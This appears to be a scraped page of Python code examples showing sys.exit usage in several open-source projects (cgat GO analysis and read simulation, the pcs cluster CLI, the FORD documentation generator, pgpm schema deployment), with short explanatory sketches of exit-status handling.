                "percent_genes_in_bg_with_associations\t%s\tpercent genes background with GO assignments\n" % (
                    IOTools.prettyPercent(len(go_results.mBackgroundGenes),
                                          nbackground, "%5.2f")))
            outfile.write(
                "significant\t%i\tsignificant results reported\n" % nselected)
            outfile.write(
                "significant_up\t%i\tsignificant up-regulated results reported\n" % nselected_up)
            outfile.write(
                "significant_down\t%i\tsignificant up-regulated results reported\n" % nselected_down)
            outfile.write(
                "threshold\t%6.4f\tsignificance threshold\n" % options.threshold)

            if options.output_filename_pattern:
                outfile.close()

            summary.append("\t".join(map(str, (
                genelist_name,
                test_ontology,
                nselected,
                options.threshold,
                ngenes,
                ncategories,
                nmaps,
                len(foreground),
                len(go_results.mSampleGenes),
                nbackground,
                len(go_results.mBackgroundGenes),
                go_results.mSampleCountsTotal,
                go_results.mBackgroundCountsTotal,
                IOTools.prettyPercent(
                    len(go_results.mSampleGenes), len(foreground), "%5.2f"),
                IOTools.prettyPercent(
                    len(go_results.mBackgroundGenes), nbackground, "%5.2f"),
                ",".join(msgs)))) + "\n")

            #############################################################
            #############################################################
            #############################################################
            # output the fg patterns
            outfile = GO.getFileName(options,
                                     go=test_ontology,
                                     section='withgenes',
                                     set=genelist_name)

            GO.outputResults(outfile, pairs, go2info, options,
                             fdrs=fdrs,
                             samples=samples,
                             gene2go=gene2go,
                             foreground=foreground,
                             gene2name=gene2name)

            if options.output_filename_pattern:
                outfile.close()

        if len(genelists) > 1:

            ###################################################################
            # output various summary files
            # significant results
            GO.outputMultipleGeneListResults(all_significant_results,
                                             all_genelists_with_results,
                                             test_ontology,
                                             go2info,
                                             options,
                                             section='significant')

            # all results
            GO.outputMultipleGeneListResults(all_results,
                                             all_genelists_with_results,
                                             test_ontology,
                                             go2info,
                                             options,
                                             section='all')

            if options.compute_pairwise:
                GO.pairwiseGOEnrichment(all_results,
                                        all_genelists_with_results,
                                        test_ontology,
                                        go2info,
                                        options)

    outfile_summary = options.stdout
    outfile_summary.write("".join(summary))

    E.Stop()
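
The early-exit branch at the top of this example (the options.get_genes shortcut) writes the requested gene sets and then calls sys.exit(0) so the script stops as soon as that side output has been produced. A minimal standalone sketch of that pattern, with illustrative names not taken from the project:

import sys

def dump_gene_sets(outfile, category, fg, bg, ng):
    # write one line per gene, labelled by the set it belongs to
    outfile.write("# genes in GO category %s\n" % category)
    outfile.write("gene\tset\n")
    for label, genes in (("fg", fg), ("bg", bg), ("ng", ng)):
        for gene in sorted(genes):
            outfile.write("%s\t%s\n" % (label, gene))
    # exit status 0: the requested diagnostic output was produced successfully
    sys.exit(0)

if __name__ == "__main__":
    dump_gene_sets(sys.stdout, "GO:0008150",
                   fg={"geneA"}, bg={"geneB"}, ng=set())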

Example 26

Project: cgat
Source File: GemReads.py
View license
def main(argv):
    refFile=''
    direct=''
    abund=''
    number=''
    length=''
    gens=''
    genDirect=''
    models=''
    circular=False
    qual=''
    out=''
    paired=False
    meta=False
    mean=''
    stdv=''
    try:
        opts, args = getopt.getopt(argv, "hr:R:a:n:g:G:l:m:ce:q:o:u:s:p")
    except getopt.GetoptError:
        usage()
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            usage()
            sys.exit()
        elif opt == '-r':
            refFile=arg
        elif opt == '-R':
            direct=arg
            meta=True
        elif opt =='-G':
            genDirect=arg
        elif opt == '-a':
            abund=arg
        elif opt == '-n':
            number = int(arg)
        elif opt == '-l':
            if arg=='d':
                length=arg
            else:
                length=int(arg)
        elif opt == '-u':
            if arg=='d':
                mean='emp'
            else:
                mean=int(arg) 
        elif opt == '-s':
            stdv=int(arg)
        elif opt == '-g':
            gens=arg
        elif opt =='-m':
            models=arg
        elif opt =='-c':
            circular=True
        elif opt =='-q':
            qual=int(arg)
        elif opt =='-o':
            out=arg
        elif opt =='-p':
            paired=True
    if number=='' or models=='' or length=='' or qual=='' or out=='':
        usage()
        sys.exit()
    if refFile=='' and direct=='':
        usage()
        sys.exit()
    if paired:
        if mean=='':
            print '\nPlease specify a fragment length\n'
            usage()
            sys.exit()
        rdlog.info('Generating paired end reads.')
        out1=open(out+'_fir.fastq','w')
        out2=open(out+'_sec.fastq','w')
        rdlog.debug('Parsing model file.')
        mx1,mx2,insD1,insD2,delD1,delD2,intervals,gQualL,bQualL,iQualL,mates,rds,rdLenD=parseModel(models,paired,length)
        rdlog.debug('Model file parsed.')
    else:
        out1=open(out+'_single.fastq','w')
        rdlog.info('Generating single reads.')
        rdlog.debug('Parsing model file.')
        mx1,insD1,delD1,gQualL,bQualL,iQualL,readCount,rdLenD=parseModel(models,paired,length)
        rdlog.debug('Model file parsed.')
        #inserts
        insDict=mkInserts(mx1,insD1)
        #deletions
        delDict=mkDels(mx1,delD1)
    if paired:
        #choose insert length
        m0=float(mates[0])
        m1=float(mates[1])
        rd0=float(rds[0])
        rd1=float(rds[1])
        unAlign0=(m0*rd1-m1*m0)/(rd0*rd1-m1*m0)
        unAlign1=1.0-(unAlign0/(m0/rd0))
        keys=intervals.keys()
        keys.sort()
        if mean=='emp':
            inters=[]
            for k in keys:
                inters.append((k,intervals[k]))
            interval=bisect_choiceTUP(inters)
        #inserts1and2
        insDict1=mkInserts(mx1,insD1)
        insDict2=mkInserts(mx2,insD2)
        #deletions1and2
        delDict1=mkDels(mx1,delD1)
        delDict2=mkDels(mx2,delD2)
    #choose good quality bases
    gQList=[]             
    for i in (gQualL):
        gL=[]
        keys=i.keys()
        keys.sort()
        for k in keys:
            gL.append((chr(k+qual),i[k]))
        gQList.append(bisect_choiceTUP(gL))
    #choose bad quality bases
    bQList=[]
    for i in (bQualL):
        bL=[]
        keys=i.keys()
        keys.sort()
        for k in keys:
            bL.append((chr(k+qual),i[k]))
        bQList.append(bisect_choiceTUP(bL))
    #choose qualities for inserts
    iQList=[]
    for i in (iQualL):
        iL=[] 
        keys=i.keys()
        keys.sort()
        for k in keys:
            iL.append((chr(k+qual),i[k]))
        iQList.append(bisect_choiceTUP(iL))
    #choose read length
    if length=='d':
        rdlog.info('Using empirical read length distribution')
        lgth=[]
        keys=rdLenD.keys()
        keys.sort()
        for k in keys:
            lgth.append((k,rdLenD[k]))
        length=bisect_choiceTUP(lgth)
    else:
        length=ln(length)
    #choose reference
    genDict={}
    if meta:
        refDict,genDict,comDict,refList=getMet(direct,genDirect, abund)
    else:
        if gens!='':
            gens=gParse(gens)
            gens=bisect_gens(gens)
        else:
            gens=genRef('')
        refDict,comDict,refList=getRef(refFile)
        genDict[refFile]=gens
    reference=bisect_choiceTUP(refList)
    count=1
    #track read origin
    readOri={}
    for r,c in refList:
        readOri[r]=0    
    while count<=number:
        hd=reference()
        ref,refFile=refDict[hd]
        cRef=comDict[hd] 
        readOri[hd]+=1
        refLen=len(ref)
        if not paired:
            readLen=length()
            read1,pos,dir,quals1=readGen1(ref,cRef,refLen,readLen,genDict[refFile](),readLen,mx1,insDict,delDict,gQList,bQList,iQList,qual,circular,hd)
            head1='@'+'r'+str(count)+'_from_'+hd+'_#0/1\n'
        else:
            val=random.random()
            ln1=length()
            ln2=length()
            if mean=='emp':
                inter=interval()
            else:
                inter=int(random.normalvariate(mean,stdv))
            while (inter+ln1+ln2) > refLen*.9 or inter<ln1*1.5:
                if mean=='emp':
                    inter=interval()
                else:
                    inter=int(random.normalvariate(mean,stdv))
            if val > unAlign0+unAlign1:        
                read1,pos,dir,quals1=readGen1(ref,cRef,refLen,ln1,genDict[refFile](),inter,mx1,insDict1,delDict1,gQList,bQList,iQList,qual,circular,hd)
                read2,quals2=readGen2(ref,cRef,pos, dir, ln2, genDict[refFile](),inter,mx2,insDict2,delDict2,gQList,bQList,iQList,qual,circular,hd)
                p1=pos
                p2=pos+inter-ln2+1
            elif val > unAlign1:
                read1,pos,dir,quals1=readGen1(ref,cRef,refLen,ln1,genDict[refFile](),inter,mx1,insDict1,delDict1,gQList,bQList,iQList,qual,circular,hd)
                read2='N'*ln2
                quals2=chr(0+qual)*ln2
                p1=pos
                p2='*'
            else:
                read1,pos,dir,quals1=readGen1(ref,cRef,refLen,ln1,genDict[refFile](),inter,mx1,insDict1,delDict1,gQList,bQList,iQList,qual,circular,hd)
                read2,quals2=readGen2(ref,cRef,pos, dir, ln2,genDict[refFile](),inter,mx2,insDict2,delDict2,gQList,bQList,iQList,qual,circular,hd)
                read1='N'*ln1
                quals1=chr(0+qual)*ln1
                p1='*'
                p2=pos+inter-ln2+1
            head1='@'+'r'+str(count)+'_from_'+hd+'_ln'+str(inter)+'_#0/1\n'
            head2='@'+'r'+str(count)+'_from_'+hd+'_ln'+str(inter)+'_#0/2\n'
        out1.write(head1)
        out1.write(read1+'\n')
        out1.write('+\n')
        out1.write(quals1+'\n')
        if paired:
            out2.write(head2)
            out2.write(read2+'\n')
            out2.write('+\n')
            out2.write(quals2+'\n')
        count+=1
        if count%5000==0:
            if paired:
                rdlog.info('...simulated '+str(count)+' read pairs.')
            else:
                rdlog.info('...simulated '+str(count)+' single reads.')
    key=readOri.keys()
    key.sort()
    for k in key:
        rdlog.info('Simulated '+str(readOri[k])+' reads from reference '+k)
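
The option handling at the top of this script follows the classic getopt idiom: exit with status 2 when getopt raises GetoptError, and exit with status 0 (sys.exit() with no argument) after printing help. A minimal self-contained sketch of that idiom, with an illustrative usage message:

import getopt
import sys

def usage():
    sys.stderr.write("usage: prog -r <reference> -n <number_of_reads>\n")

def parse_args(argv):
    try:
        opts, args = getopt.getopt(argv, "hr:n:")
    except getopt.GetoptError as err:
        sys.stderr.write(str(err) + "\n")
        usage()
        sys.exit(2)          # conventional exit status for a usage error
    for opt, arg in opts:
        if opt == "-h":
            usage()
            sys.exit()       # SystemExit(None) maps to exit status 0
    return dict(opts), args

if __name__ == "__main__":
    print(parse_args(sys.argv[1:]))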

Example 27

Project: pcs
Source File: app.py
View license
def main(argv=None):
    if completion.has_applicable_environment(os.environ):
        print(completion.make_suggestions(
            os.environ,
            usage.generate_completion_tree_from_usage()
        ))
        sys.exit()

    argv = argv if argv else sys.argv[1:]
    utils.subprocess_setup()
    global filename, usefile
    orig_argv = argv[:]
    utils.pcs_options = {}
    modified_argv = []
    real_argv = []
    try:
        # we change --cloneopt to "clone" for backwards compatibility
        new_argv = []
        for arg in argv:
            if arg == "--cloneopt" or arg == "--clone":
                new_argv.append("clone")
            elif arg.startswith("--cloneopt="):
                new_argv.append("clone")
                new_argv.append(arg.split('=',1)[1])
            else:
                new_argv.append(arg)
        argv = new_argv

        # we want to support optional arguments for --wait, so if an argument
        # is specified with --wait (i.e. --wait=30) then we use it
        waitsecs = None
        new_argv = []
        for arg in argv:
            if arg.startswith("--wait="):
                tempsecs = arg.replace("--wait=","")
                if len(tempsecs) > 0:
                    waitsecs = tempsecs
                    arg = "--wait"
            new_argv.append(arg)
        argv = new_argv

        # h = help, f = file,
        # p = password (cluster auth), u = user (cluster auth),
        # V = verbose (cluster verify)
        pcs_short_options = "hf:p:u:V"
        pcs_long_options = [
            "debug", "version", "help", "fullhelp",
            "force", "skip-offline", "autocorrect", "interactive", "autodelete",
            "all", "full", "groups", "local", "wait", "config",
            "start", "enable", "disabled", "off",
            "pacemaker", "corosync",
            "no-default-ops", "defaults", "nodesc",
            "clone", "master", "name=", "group=", "node=",
            "from=", "to=", "after=", "before=",
            "transport=", "rrpmode=", "ipv6",
            "addr0=", "bcast0=", "mcast0=", "mcastport0=", "ttl0=", "broadcast0",
            "addr1=", "bcast1=", "mcast1=", "mcastport1=", "ttl1=", "broadcast1",
            "wait_for_all=", "auto_tie_breaker=", "last_man_standing=",
            "last_man_standing_window=",
            "token=", "token_coefficient=", "consensus=", "join=",
            "miss_count_const=", "fail_recv_const=",
            "corosync_conf=", "cluster_conf=",
            "booth-conf=", "booth-key=",
            "remote", "watchdog=",
            #in pcs status - do not display resource status on inactive node
            "hide-inactive",
        ]
        # pull out negative number arguments and add them back after getopt
        prev_arg = ""
        for arg in argv:
            if len(arg) > 0 and arg[0] == "-":
                if arg[1:].isdigit() or arg[1:].startswith("INFINITY"):
                    real_argv.append(arg)
                else:
                    modified_argv.append(arg)
            else:
                # If previous argument required an argument, then this arg
                # should not be added back in
                if not prev_arg or (not (prev_arg[0] == "-" and prev_arg[1:] in pcs_short_options) and not (prev_arg[0:2] == "--" and (prev_arg[2:] + "=") in pcs_long_options)):
                    real_argv.append(arg)
                modified_argv.append(arg)
            prev_arg = arg

        pcs_options, argv = getopt.gnu_getopt(modified_argv, pcs_short_options, pcs_long_options)
    except getopt.GetoptError as err:
        print(err)
        usage.main()
        sys.exit(1)
    argv = real_argv
    for o, a in pcs_options:
        if not o in utils.pcs_options:
            if o == "--watchdog":
                a = [a]
            utils.pcs_options[o] = a
        else:
            # If any options are a list then they've been entered twice which isn't valid
            if o != "--watchdog":
                utils.err("%s can only be used once" % o)
            else:
                utils.pcs_options[o].append(a)

        if o == "-h" or o == "--help":
            if len(argv) == 0:
                usage.main()
                sys.exit()
            else:
                argv = [argv[0], "help" ] + argv[1:]
        elif o == "-f":
            usefile = True
            filename = a
            utils.usefile = usefile
            utils.filename = filename
        elif o == "--corosync_conf":
            settings.corosync_conf_file = a
        elif o == "--cluster_conf":
            settings.cluster_conf_file = a
        elif o == "--version":
            print(settings.pcs_version)
            sys.exit()
        elif o == "--fullhelp":
            usage.full_usage()
            sys.exit()
        elif o == "--wait":
            utils.pcs_options[o] = waitsecs

    if len(argv) == 0:
        usage.main()
        sys.exit(1)

    # create a dummy logger
    # we do not have a log file for cli (yet), but library requires a logger
    logger = logging.getLogger("old_cli")
    logger.propagate = 0
    logger.handlers = []

    command = argv.pop(0)
    if (command == "-h" or command == "help"):
        usage.main()
        return
    cmd_map = {
        "resource": resource.resource_cmd,
        "cluster": cluster.cluster_cmd,
        "stonith": stonith.stonith_cmd,
        "property": prop.property_cmd,
        "constraint": constraint.constraint_cmd,
        "acl": lambda argv: acl.acl_cmd(
            utils.get_library_wrapper(),
            argv,
            utils.get_modificators()
        ),
        "status": status.status_cmd,
        "config": config.config_cmd,
        "pcsd": pcsd.pcsd_cmd,
        "node": node.node_cmd,
        "quorum": lambda argv: quorum.quorum_cmd(
            utils.get_library_wrapper(),
            argv,
            utils.get_modificators()
        ),
        "qdevice": lambda argv: qdevice.qdevice_cmd(
            utils.get_library_wrapper(),
            argv,
            utils.get_modificators()
        ),
        "alert": lambda args: alert.alert_cmd(
            utils.get_library_wrapper(),
            args,
            utils.get_modificators()
        ),
        "booth": lambda argv: booth.booth_cmd(
            utils.get_library_wrapper(),
            argv,
            utils.get_modificators()
        ),
    }
    if command not in cmd_map:
        usage.main()
        sys.exit(1)
    # root can run everything directly, help can always be displayed,
    # and working on a local file does not require running under root
    if (os.getuid() == 0) or (argv and argv[0] == "help") or usefile:
        cmd_map[command](argv)
        return
    # specific commands need to be run under root account, pass them to pcsd
    # don't forget to allow each command in pcsd.rb in "post /run_pcs do"
    root_command_list = [
        ['cluster', 'auth', '...'],
        ['cluster', 'corosync', '...'],
        ['cluster', 'destroy', '...'],
        ['cluster', 'disable', '...'],
        ['cluster', 'enable', '...'],
        ['cluster', 'node', '...'],
        ['cluster', 'pcsd-status', '...'],
        ['cluster', 'setup', '...'],
        ['cluster', 'start', '...'],
        ['cluster', 'stop', '...'],
        ['cluster', 'sync', '...'],
        # ['config', 'restore', '...'], # handled in config.config_restore
        ['pcsd', 'sync-certificates'],
        ['status', 'nodes', 'corosync-id'],
        ['status', 'nodes', 'pacemaker-id'],
        ['status', 'pcsd', '...'],
    ]
    argv_cmd = argv[:]
    argv_cmd.insert(0, command)
    for root_cmd in root_command_list:
        if (
            (argv_cmd == root_cmd)
            or
            (
                root_cmd[-1] == "..."
                and
                argv_cmd[:len(root_cmd)-1] == root_cmd[:-1]
            )
        ):
            # handle interactivity of 'pcs cluster auth'
            if argv_cmd[0:2] == ["cluster", "auth"]:
                if "-u" not in utils.pcs_options:
                    username = utils.get_terminal_input('Username: ')
                    orig_argv.extend(["-u", username])
                if "-p" not in utils.pcs_options:
                    password = utils.get_terminal_password()
                    orig_argv.extend(["-p", password])

            # call the local pcsd
            err_msgs, exitcode, std_out, std_err = utils.call_local_pcsd(
                orig_argv, True
            )
            if err_msgs:
                for msg in err_msgs:
                    utils.err(msg, False)
                sys.exit(1)
            if std_out.strip():
                print(std_out)
            if std_err.strip():
                sys.stderr.write(std_err)
            sys.exit(exitcode)
            return
    cmd_map[command](argv)
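
When a command has to be run through the local pcsd daemon, the example above forwards the command and then re-uses the daemon's exit status via sys.exit(exitcode), so the wrapper terminates exactly like the underlying call. A small sketch of that forwarding pattern; call_daemon stands in for utils.call_local_pcsd and is assumed to return the same (err_msgs, exitcode, std_out, std_err) tuple:

import sys

def run_via_daemon(call_daemon, argv):
    err_msgs, exitcode, std_out, std_err = call_daemon(argv)
    if err_msgs:
        for msg in err_msgs:
            sys.stderr.write("Error: %s\n" % msg)
        sys.exit(1)
    if std_out.strip():
        print(std_out)
    if std_err.strip():
        sys.stderr.write(std_err)
    # propagate the daemon's exit status to our own caller
    sys.exit(exitcode)

if __name__ == "__main__":
    fake_daemon = lambda argv: ([], 0, "status: OK", "")
    run_via_daemon(fake_daemon, sys.argv[1:])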

Example 28

Project: ford
Source File: __init__.py
View license
def initialize():
    """
    Method to parse and check configurations of FORD, get the project's 
    global documentation, and create the Markdown reader.
    """
    # Setup the command-line options and parse them.
    parser = argparse.ArgumentParser(description="Document a program or library written in modern Fortran. Any command-line options over-ride those specified in the project file.")
    parser.add_argument("project_file",help="file containing the description and settings for the project",
                        type=argparse.FileType('r'))
    parser.add_argument("-d","--src_dir",action="append",help='directories containing all source files for the project')
    parser.add_argument("-p","--page_dir",help="directory containing the optional page tree describing the project")
    parser.add_argument("-o","--output_dir",help="directory in which to place output files")
    parser.add_argument("-s","--css",help="custom style-sheet for the output")
    parser.add_argument("--exclude",action="append",help="any files which should not be included in the documentation")
    parser.add_argument("--exclude_dir",action="append",help="any directories whose contents should not be included in the documentation")
    parser.add_argument("-e","--extensions",action="append",help="extensions which should be scanned for documentation (default: f90, f95, f03, f08)")
    parser.add_argument("-m","--macro",action="append",help="preprocessor macro (and, optionally, its value) to be applied to files in need of preprocessing.")
    parser.add_argument("-w","--warn",dest='warn',action='store_true',
                        help="display warnings for undocumented items")
    parser.add_argument("--no-search",dest='search',action='store_false',
                        help="don't process documentation to produce a search feature")
    parser.add_argument("-q","--quiet",dest='quiet',action='store_true',
                        help="do not print any description of progress")
    parser.add_argument("-V", "--version", action="version",
                        version="{}, version {}".format(__appname__,__version__))
    parser.add_argument("--debug",dest="dbg",action="store_true",
                        help="display traceback if fatal exception occurs")
    parser.add_argument("-I","--include",action="append",
                        help="any directories which should be searched for include files")
    # Get options from command-line
    args = parser.parse_args()
    # Set up Markdown reader
    md_ext = ['markdown.extensions.meta','markdown.extensions.codehilite',
              'markdown.extensions.extra',MathJaxExtension(),'md_environ.environ']
    md = markdown.Markdown(extensions=md_ext, output_format="html5",
    extension_configs={})
    # Read in the project-file. This will contain global documentation (which
    # will appear on the homepage) as well as any information about the project
    # and settings for generating the documentation.
    proj_docs = args.project_file.read()
    md.convert(proj_docs)
    # Remake the Markdown object with settings parsed from the project_file
    if 'md_base_dir' in md.Meta: md_base = md.Meta['md_base_dir'][0] 
    else: md_base = os.path.dirname(args.project_file.name)
    md_ext.append('markdown_include.include')
    if 'md_extensions' in md.Meta: md_ext.extend(md.Meta['md_extensions'])
    md = markdown.Markdown(extensions=md_ext, output_format="html5",
            extension_configs={'markdown_include.include': {'base_path': md_base}})
    md.reset()
    # Re-read the project file
    proj_docs = md.convert(proj_docs)
    proj_data = md.Meta
    md.reset()
    # Get the default options, and any over-rides, straightened out
    options = ['src_dir','extensions','fpp_extensions','fixed_extensions',
               'output_dir','css','exclude',
               'project','author','author_description','author_pic',
               'summary','github','bitbucket','facebook','twitter',
               'google_plus','linkedin','email','website','project_github',
               'project_bitbucket','project_website','project_download',
               'project_sourceforge','project_url','display','version',
               'year','docmark','predocmark','docmark_alt','predocmark_alt',
               'media_dir','favicon','warn','extra_vartypes','page_dir',
               'source','exclude_dir','macro','include','preprocess','quiet',
               'search','lower','sort','extra_mods','dbg','graph', 'license',
               'extra_filetypes','preprocessor','creation_date',
               'print_creation_date','proc_internals','coloured_edges',
               'graph_dir','gitter_sidecar']
    defaults = {'src_dir':             ['./src'],
                'extensions':          ['f90','f95','f03','f08','f15'],
                'fpp_extensions':      ['F90','F95','F03','F08','F15','F','FOR'],
                'fixed_extensions':    ['f','for','F','FOR'],
                'output_dir':          './doc',
                'project':             'Fortran Program',
                'project_url':         '',
                'display':             ['public','protected'],
                'year':                date.today().year,
                'exclude':             [],
                'exclude_dir':         [],
                'docmark':             '!',
                'docmark_alt':         '*',
                'predocmark':          '>',
                'predocmark_alt':      '|',
                'favicon':             'default-icon',
                'extra_vartypes':      [],
                'source':              'false',
                'macro':               [],
                'include':             [],
                'preprocess':          'true',
                'preprocessor':        '',
                'proc_internals':      'false',
                'warn':                'false',
                'quiet':               'false',
                'search':              'true',
                'lower':               'false',
                'sort':                'src',
                'extra_mods':          [],
                'dbg':                 False,
                'graph':               'false',
                'license':             '',
                'extra_filetypes':     [],
                'creation_date':       '%Y-%m-%dT%H:%M:%S.%f%z',
                'print_creation_date': False,
                'coloured_edges':      'false',
               }
    listopts = ['extensions','fpp_extensions','fixed_extensions','display',
                'extra_vartypes','src_dir','exclude','exclude_dir',
                'macro','include','extra_mods','extra_filetypes']
    # Evaluate paths relative to project file location
    base_dir = os.path.abspath(os.path.dirname(args.project_file.name))
    proj_data['base_dir'] = base_dir
    for var in ['src_dir','page_dir','output_dir','exclude_dir','graph_dir','media_dir','include','favicon','css']:
        if var in proj_data:
            proj_data[var] = [os.path.normpath(os.path.join(base_dir,os.path.expanduser(os.path.expandvars(p)))) for p in proj_data[var]]
    if args.warn:
        args.warn = 'true'
    else:
        del args.warn
    if args.quiet:
        args.quiet = 'true'
    else:
        del args.quiet
    if not args.search:
        args.search = 'false'
    else:
        del args.search
    for option in options:
        if hasattr(args,option) and getattr(args,option):
            proj_data[option] = getattr(args,option)
        elif option in proj_data:
            # Think about whether there is a safe way to evaluate any expressions found in this list
            #proj_data[option] = proj_data[option]
            if option not in listopts:
                proj_data[option] = '\n'.join(proj_data[option])
        elif option in defaults:
           proj_data[option] = defaults[option]
    proj_data['display'] = [ item.lower() for item in proj_data['display'] ]
    proj_data['creation_date'] = datetime.now().strftime(proj_data['creation_date'])
    relative = (proj_data['project_url'] == '')
    proj_data['relative'] = relative
    proj_data['extensions'] += [ext for ext in proj_data['fpp_extensions'] if ext not in proj_data['extensions']]
    # Parse file extensions and comment characters for extra filetypes
    extdict = {}
    for ext in proj_data['extra_filetypes']:
        sp = ext.split()
        if len(sp) < 2: continue
        extdict[sp[0]] = sp[1]
    proj_data['extra_filetypes'] = extdict
    # Make sure no src_dir is contained within output_dir
    for projdir in proj_data['src_dir']:
        proj_path = ford.utils.split_path(projdir)
        out_path  = ford.utils.split_path(proj_data['output_dir'])
        for directory in out_path:
            if len(proj_path) ==  0: break
            if directory == proj_path[0]:
                proj_path.remove(directory)
            else:
                break
        else:
            print('Error: directory containing source-code {} is a subdirectory of output directory {}.'.format(projdir, proj_data['output_dir']))
            sys.exit(1)
    # Check that none of the docmarks are the same
    if proj_data['docmark'] == proj_data['predocmark'] != '':
        print('Error: docmark and predocmark are the same.')
        sys.exit(1)
    if proj_data['docmark'] == proj_data['docmark_alt'] != '':
        print('Error: docmark and docmark_alt are the same.')
        sys.exit(1)
    if proj_data['docmark'] == proj_data['predocmark_alt'] != '':
        print('Error: docmark and predocmark_alt are the same.')
        sys.exit(1)
    if proj_data['docmark_alt'] == proj_data['predocmark'] != '':
        print('Error: docmark_alt and predocmark are the same.')
        sys.exit(1)
    if proj_data['docmark_alt'] == proj_data['predocmark_alt'] != '':
        print('Error: docmark_alt and predocmark_alt are the same.')
        sys.exit(1)
    if proj_data['predocmark'] == proj_data['predocmark_alt'] != '':
        print('Error: predocmark and predocmark_alt are the same.')
        sys.exit(1)
    # Add gitter sidecar if specified in metadata
    if 'gitter_sidecar' in proj_data:
        proj_docs += '''
        <script>
            ((window.gitter = {{}}).chat = {{}}).options = {{
            room: '{}'
            }};
        </script>
        <script src="https://sidecar.gitter.im/dist/sidecar.v1.js" async defer></script>
        '''.format(proj_data['gitter_sidecar'].strip())
    # Handle preprocessor:
    if proj_data['preprocess'].lower() == 'true':
        if proj_data['preprocessor']:
            preprocessor = proj_data['preprocessor'].split()
        else:
            preprocessor = ['cpp','-traditional-cpp','-E', '-D__GFORTRAN__']

        # Check whether preprocessor works (reading nothing from stdin)
        try:
            devnull = open(os.devnull)
            subprocess.Popen(preprocessor, stdin=devnull, stdout=devnull,
                             stderr=devnull).communicate()
        except OSError as ex:
            print('Warning: Testing preprocessor failed')
            print('  Preprocessor command: {}'.format(preprocessor))
            print('  Exception: {}'.format(ex))
            print('  -> Preprocessing turned off')
            proj_data['preprocess'] = 'false'
        else:
            proj_data['preprocess'] = 'true'
            proj_data['preprocessor'] = preprocessor
    
    # Get correct license
    try:
        proj_data['license'] = LICENSES[proj_data['license'].lower()]
    except KeyError:
        print('Warning: license "{}" not recognized.'.format(proj_data['license']))
        proj_data['license'] = ''
    # Return project data, docs, and the Markdown reader
    md.reset()
    md.Meta = {}
    return (proj_data, proj_docs, md)
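
The block of pairwise docmark checks near the end of this function is a plain validation pattern: if two markers that must differ turn out to be equal, print an error and terminate with sys.exit(1). A compact sketch of the same check, collapsed into a loop over all pairs (assuming the four setting names used above):

import itertools
import sys

def check_docmarks(settings):
    names = ['docmark', 'docmark_alt', 'predocmark', 'predocmark_alt']
    for a, b in itertools.combinations(names, 2):
        # chained comparison: equal to each other and both non-empty
        if settings[a] == settings[b] != '':
            print('Error: {} and {} are the same.'.format(a, b))
            sys.exit(1)

if __name__ == "__main__":
    check_docmarks({'docmark': '!', 'docmark_alt': '*',
                    'predocmark': '>', 'predocmark_alt': '|'})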

Example 29

Project: pgpm
Source File: deploy.py
View license
    def deploy_schema_to_db(self, mode='safe', files_deployment=None, vcs_ref=None, vcs_link=None,
                            issue_ref=None, issue_link=None, compare_table_scripts_as_int=False,
                            config_path=None, config_dict=None, config_object=None, source_code_path=None,
                            auto_commit=False):
        """
        Deploys schema
        :param files_deployment: if specific scripts are to be deployed, only find those
        :param mode:
        :param vcs_ref:
        :param vcs_link:
        :param issue_ref:
        :param issue_link:
        :param compare_table_scripts_as_int:
        :param config_path:
        :param config_dict:
        :param config_object:
        :param source_code_path:
        :param auto_commit:
        :return: dictionary of the following format:
            {
                code: 0 if all fine, otherwise something else,
                message: message on the output
                function_scripts_requested: list of function files requested for deployment
                function_scripts_deployed: list of function files deployed
                type_scripts_requested: list of type files requested for deployment
                type_scripts_deployed: list of type files deployed
                view_scripts_requested: list of view files requested for deployment
                view_scripts_deployed: list of view files deployed
                trigger_scripts_requested: list of trigger files requested for deployment
                trigger_scripts_deployed: list of trigger files deployed
                table_scripts_requested: list of table files requested for deployment
                table_scripts_deployed: list of table files deployed
                requested_files_count: count of requested files to deploy
                deployed_files_count: count of deployed files
            }
        :rtype: dict
        """

        return_value = {}
        if files_deployment:
            return_value['function_scripts_requested'] = files_deployment
            return_value['type_scripts_requested'] = []
            return_value['view_scripts_requested'] = []
            return_value['trigger_scripts_requested'] = []
            return_value['table_scripts_requested'] = []

        if auto_commit:
            if mode == 'safe' and files_deployment:
                self._logger.debug("Auto commit mode is on. Be careful.")
            else:
                self._logger.error("Auto commit deployment can only be done with file "
                                   "deployments and in safe mode for security reasons")
                raise ValueError("Auto commit deployment can only be done with file "
                                 "deployments and in safe mode for security reasons")

        # set source code path if exists
        self._source_code_path = self._source_code_path or source_code_path

        # set configuration if either of config_path, config_dict, config_object are set.
        # Otherwise use configuration from class initialisation
        if config_object:
            self._config = config_object
        elif config_path or config_dict:
            self._config = pgpm.lib.utils.config.SchemaConfiguration(config_path, config_dict, self._source_code_path)

        # Check if in git repo
        if not vcs_ref:
            if pgpm.lib.utils.vcs.is_git_directory(self._source_code_path):
                vcs_ref = pgpm.lib.utils.vcs.get_git_revision_hash(self._source_code_path)
                self._logger.debug('commit reference to be deployed is {0}'.format(vcs_ref))
            else:
                self._logger.debug('Folder is not a known vcs repository')

        self._logger.debug('Configuration of package {0} of version {1} loaded successfully.'
                           .format(self._config.name, self._config.version.raw))  # TODO: change to to_string once discussed
        # .format(self._config.name, self._config.version.to_string()))

        # Get scripts
        type_scripts_dict = self._get_scripts(self._config.types_path, files_deployment,
                                              "types", self._source_code_path)
        if not files_deployment:
            return_value['type_scripts_requested'] = [key for key in type_scripts_dict]

        function_scripts_dict = self._get_scripts(self._config.functions_path, files_deployment,
                                                  "functions", self._source_code_path)
        if not files_deployment:
            return_value['function_scripts_requested'] = [key for key in function_scripts_dict]

        view_scripts_dict = self._get_scripts(self._config.views_path, files_deployment,
                                              "views", self._source_code_path)
        if not files_deployment:
            return_value['view_scripts_requested'] = [key for key in view_scripts_dict]

        trigger_scripts_dict = self._get_scripts(self._config.triggers_path, files_deployment,
                                                 "triggers", self._source_code_path)
        if not files_deployment:
            return_value['trigger_scripts_requested'] = [key for key in trigger_scripts_dict]

        # previously, only the file name was used as an identifier for table scripts;
        # now the whole path of the file relative to config.json is used
        # table_scripts_dict_denormalised = self._get_scripts(self._config.tables_path, files_deployment,
        #                                                     "tables", self._source_code_path)
        # table_scripts_dict = {os.path.split(k)[1]: v for k, v in table_scripts_dict_denormalised.items()}
        table_scripts_dict = self._get_scripts(self._config.tables_path, files_deployment,
                                               "tables", self._source_code_path)
        if not files_deployment:
            return_value['table_scripts_requested'] = [key for key in table_scripts_dict]

        if self._conn.closed:
